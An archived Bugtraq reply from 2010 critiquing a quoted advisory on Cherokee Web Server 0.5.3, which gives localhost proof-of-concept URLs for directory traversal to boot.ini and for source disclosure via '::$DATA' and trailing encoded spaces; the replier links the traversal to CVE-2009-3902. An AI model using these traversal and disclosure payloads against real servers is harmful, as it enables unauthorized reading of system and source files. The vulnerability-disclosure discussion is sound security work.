Bugtraq mailing list archives
Re: Cherokee Web Server 0.5.3 Multiple Vulnerabilities
From: security curmudgeon <jericho () attrition org>
Date: Thu, 1 Jul 2010 19:16:40 -0500 (CDT)
On Sat, 12 Jun 2010, info () securitylab ir wrote: : ################################################################# : # Securitylab.ir : ################################################################# : # Application Info: : # Name: Cherokee Web Server : # Version: 0.5.3 : # Download: http://mirror.aarnet.edu.au/pub/cherokee/windows/Cherokee-setup-0.5.3.exe : ################################################################# : [Directory Traversal]: : http://127.0.0.1/%5C../%5C../%5C../boot.ini%20 This is essentially CVE-2009-3902, just encoding one char. : [Remote Source Disclosure]: : http://127.0.0.1:80/file.html::$DATA : : http://127.0.0.1/index.htm%20 Did you try these on something other than HTML? Did it work for .php or .asp for example?
Current thread:
- Re: Cherokee Web Server 0.5.3 Multiple Vulnerabilities security curmudgeon (Jul 02)